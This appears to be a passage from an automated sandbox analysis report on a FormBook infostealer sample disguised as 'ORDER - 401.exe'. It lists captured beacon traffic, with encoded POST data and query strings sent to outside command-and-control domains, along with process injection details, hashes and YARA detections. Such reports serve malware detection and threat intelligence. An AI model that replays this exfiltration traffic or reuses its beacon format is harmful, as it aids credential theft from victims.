                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                                                                                Dec 14, 2024 13:53:13.018394947 CET | 316 | IN | Data Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
                                                                                Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                48 | 192.168.2.5 | 50059 | 162.0.217.35 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 14, 2024 13:53:14.092714071 CET | 481 | OUT | GET /e48k/?V6T=lB24KzN0lF-8&NVK8=xChAp+bkagQqJ6WkRQ2a7hjYaWsF9/M9/8HR53jdsKBVrNgXqnyx46Jn2F+RutsZwBel4mZ5ysAGK73cAQnl7mQqaam/kdOg/hlIEVseDVvXkJ4BLCZJtbvg9L026A0VzA== HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.54248711.xyz
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Dec 14, 2024 13:53:15.421649933 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                keep-alive: timeout=5, max=100
                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                pragma: no-cache
                                                                                content-type: text/html
                                                                                content-length: 1251
                                                                                date: Sat, 14 Dec 2024 12:53:15 GMT
                                                                                server: LiteSpeed
                                                                                x-turbo-charged-by: LiteSpeed
                                                                                connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                                                                                Dec 14, 2024 13:53:15.421708107 CET | 316 | IN | Data Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
                                                                                Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                49 | 192.168.2.5 | 50060 | 81.2.196.198 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 14, 2024 13:53:21.208895922 CET | 764 | OUT | POST /zmax/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.bagatowcannabis.cloud
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Origin: http://www.bagatowcannabis.cloud
                                                                                Referer: http://www.bagatowcannabis.cloud/zmax/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 52 36 70 6b 4f 6d 55 4b 68 47 35 74 66 46 67 56 4b 54 51 6a 77 69 72 6b 2b 73 30 42 4c 72 30 77 43 4f 69 6d 76 4c 54 4f 65 32 6b 4b 37 63 49 71 74 50 77 78 53 50 7a 35 45 56 6a 78 32 46 39 31 4a 39 31 70 49 74 5a 33 5a 46 72 37 39 6f 71 51 37 55 57 6c 74 4f 49 51 34 63 58 75 75 73 45 68 6d 54 44 6b 47 53 6d 68 6c 72 33 6a 56 67 35 4a 4e 74 42 36 2b 4c 54 37 44 35 41 65 39 6c 72 47 54 74 45 66 75 7a 63 58 51 4e 79 49 72 47 7a 59 4a 71 78 4d 63 6f 6a 42 4e 62 74 38 79 4a 34 43 4d 69 73 74 2b 66 7a 63 46 62 6a 69 61 43 37 4a 64 55 54 50 57 67 49 73 4d 48 53 65 46 37 62 61 4e 38 76 70 2f 6f 67 3d
                                                                                Data Ascii: NVK8=R6pkOmUKhG5tfFgVKTQjwirk+s0BLr0wCOimvLTOe2kK7cIqtPwxSPz5EVjx2F91J91pItZ3ZFr79oqQ7UWltOIQ4cXuusEhmTDkGSmhlr3jVg5JNtB6+LT7D5Ae9lrGTtEfuzcXQNyIrGzYJqxMcojBNbt8yJ4CMist+fzcFbjiaC7JdUTPWgIsMHSeF7baN8vp/og=
                                                                                Dec 14, 2024 13:53:22.487040997 CET | 355 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Sat, 14 Dec 2024 12:53:22 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                50 | 192.168.2.5 | 50061 | 81.2.196.198 | 80 | 6008 | C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 14, 2024 13:53:23.879235983 CET | 784 | OUT | POST /zmax/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.bagatowcannabis.cloud
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Origin: http://www.bagatowcannabis.cloud
                                                                                Referer: http://www.bagatowcannabis.cloud/zmax/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 52 36 70 6b 4f 6d 55 4b 68 47 35 74 4f 55 51 56 4d 77 49 6a 37 69 72 6a 39 73 30 42 41 4c 31 35 43 4f 65 6d 76 50 6a 6b 5a 46 51 4b 31 64 34 71 75 4f 77 78 42 2f 7a 35 4c 31 6a 4f 34 6c 39 38 4a 38 4a 62 49 6f 5a 33 5a 46 2f 37 39 71 79 51 37 6e 2b 6b 73 65 49 53 30 38 58 6f 6a 4d 45 68 6d 54 44 6b 47 53 43 48 6c 72 76 6a 56 52 4a 4a 66 63 42 37 30 72 54 34 56 70 41 65 35 6c 72 4b 54 74 46 77 75 33 63 35 51 50 36 49 72 47 6a 59 4a 35 70 4e 46 59 6a 48 51 4c 73 34 7a 35 39 55 42 41 73 38 6a 38 71 65 45 4a 2f 59 53 55 4b 6a 48 32 62 6e 46 41 6b 55 63 55 61 70 55 4c 36 7a 58 66 2f 5a 68 2f 33 52 5a 6d 37 72 4f 58 6d 52 6d 70 41 51 61 45 4a 6b 76 6a 35 73
                                                                                Data Ascii: NVK8=R6pkOmUKhG5tOUQVMwIj7irj9s0BAL15COemvPjkZFQK1d4quOwxB/z5L1jO4l98J8JbIoZ3ZF/79qyQ7n+kseIS08XojMEhmTDkGSCHlrvjVRJJfcB70rT4VpAe5lrKTtFwu3c5QP6IrGjYJ5pNFYjHQLs4z59UBAs8j8qeEJ/YSUKjH2bnFAkUcUapUL6zXf/Zh/3RZm7rOXmRmpAQaEJkvj5s
                                                                                Dec 14, 2024 13:53:25.151479959 CET | 355 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Sat, 14 Dec 2024 12:53:24 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                51 | 192.168.2.5 | 50062 | 81.2.196.198 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 14, 2024 13:53:26.907990932 CET | 1801 | OUT | POST /zmax/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.bagatowcannabis.cloud
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Origin: http://www.bagatowcannabis.cloud
                                                                                Referer: http://www.bagatowcannabis.cloud/zmax/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 52 36 70 6b 4f 6d 55 4b 68 47 35 74 4f 55 51 56 4d 77 49 6a 37 69 72 6a 39 73 30 42 41 4c 31 35 43 4f 65 6d 76 50 6a 6b 5a 46 49 4b 31 76 77 71 75 70 45 78 43 2f 7a 35 43 56 6a 31 34 6c 38 2b 4a 38 52 66 49 6f 64 6e 5a 48 48 37 2b 4c 53 51 39 57 2b 6b 35 4f 49 53 72 4d 58 74 75 73 45 30 6d 54 54 67 47 53 53 48 6c 72 76 6a 56 53 52 4a 64 4e 42 37 79 72 54 37 44 35 42 52 39 6c 72 6d 54 72 74 4b 75 33 51 48 52 2f 61 49 6f 6d 54 59 50 4c 78 4e 61 6f 6a 46 54 4c 73 65 7a 34 41 4b 42 41 77 77 6a 2f 32 67 45 4c 2f 59 53 53 50 43 62 57 62 59 54 32 67 5a 52 31 4b 30 4b 75 57 54 61 4e 37 32 6e 4e 54 6c 55 46 44 37 43 77 75 6a 74 4e 35 56 4a 68 4a 6c 67 56 77 30 30 31 72 70 50 4c 32 43 4f 59 43 32 54 61 6e 66 72 75 59 61 4f 52 4e 48 69 31 6d 76 43 4a 50 37 35 6a 30 66 6f 33 69 4d 72 46 41 66 44 73 41 72 77 54 47 46 35 43 55 78 70 62 30 78 4f 57 67 30 48 42 6b 69 6d 4c 62 2b 54 4f 64 48 57 69 73 4e 50 69 77 6f 79 64 35 37 33 43 4f 49 61 4d 76 70 41 43 55 51 44 39 30 5a 4c 56 70 33 54 43 70 6e 37 [TRUNCATED]
                                                                                Data Ascii: NVK8= [TRUNCATED]
                                                                                Dec 14, 2024 13:53:28.184179068 CET | 355 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Sat, 14 Dec 2024 12:53:27 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                52 | 192.168.2.5 | 50063 | 81.2.196.198 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 14, 2024 13:53:29.578210115 CET | 490 | OUT | GET /zmax/?NVK8=c4BENRMdvExsGH0SBTpe30rq6PgBdYYINfe+1MbqTEgo+clVhexpavqEdWzY6VY2Bf1XKclHU3L+/KXqkFrj6MgG392Vu6gwiCPkGxCor7quDyVMbfsrwMj3Ae4U3nGzRw==&V6T=lB24KzN0lF-8 HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.bagatowcannabis.cloud
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Dec 14, 2024 13:53:30.855499983 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Sat, 14 Dec 2024 12:53:30 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 548
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Target ID:0
                                                                                Start time:07:49:18
                                                                                Start date:14/12/2024
                                                                                Path:C:\Users\user\Desktop\ORDER - 401.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\ORDER - 401.exe"
                                                                                Imagebase:0x200000
                                                                                File size:836'608 bytes
                                                                                MD5 hash:0B1DCCAEE94A61586E90E0A62AB20100
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:3
                                                                                Start time:07:49:26
                                                                                Start date:14/12/2024
                                                                                Path:C:\Users\user\Desktop\ORDER - 401.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\Desktop\ORDER - 401.exe"
                                                                                Imagebase:0x3b0000
                                                                                File size:836'608 bytes
                                                                                MD5 hash:0B1DCCAEE94A61586E90E0A62AB20100
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:4
                                                                                Start time:07:49:26
                                                                                Start date:14/12/2024
                                                                                Path:C:\Users\user\Desktop\ORDER - 401.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\Desktop\ORDER - 401.exe"
                                                                                Imagebase:0xa0000
                                                                                File size:836'608 bytes
                                                                                MD5 hash:0B1DCCAEE94A61586E90E0A62AB20100
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:5
                                                                                Start time:07:49:26
                                                                                Start date:14/12/2024
                                                                                Path:C:\Users\user\Desktop\ORDER - 401.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\ORDER - 401.exe"
                                                                                Imagebase:0x460000
                                                                                File size:836'608 bytes
                                                                                MD5 hash:0B1DCCAEE94A61586E90E0A62AB20100
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2476991875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2477699059.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2479332677.0000000001330000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:7
                                                                                Start time:07:49:37
                                                                                Start date:14/12/2024
                                                                                Path:C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe"
                                                                                Imagebase:0xca0000
                                                                                File size:140'800 bytes
                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4677224235.0000000002550000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Target ID:8
                                                                                Start time:07:49:39
                                                                                Start date:14/12/2024
                                                                                Path:C:\Windows\SysWOW64\ieUnatt.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\SysWOW64\ieUnatt.exe"
                                                                                Imagebase:0x4c0000
                                                                                File size:122'880 bytes
                                                                                MD5 hash:4E9919DF2EF531B389ABAEFD35AD546E
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4677196971.0000000004120000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4676244008.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4677244560.0000000004170000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:false

                                                                                Target ID:10
                                                                                Start time:07:49:52
                                                                                Start date:14/12/2024
                                                                                Path:C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe"
                                                                                Imagebase:0xca0000
                                                                                File size:140'800 bytes
                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4679125210.0000000005500000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Target ID:11
                                                                                Start time:07:50:04
                                                                                Start date:14/12/2024
                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                Imagebase:0x7ff79f9e0000
                                                                                File size:676'768 bytes
                                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                  Execution Graph

                                                                                  Execution Coverage:9.8%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:62
                                                                                  Total number of Limit Nodes:7

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2295332344.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
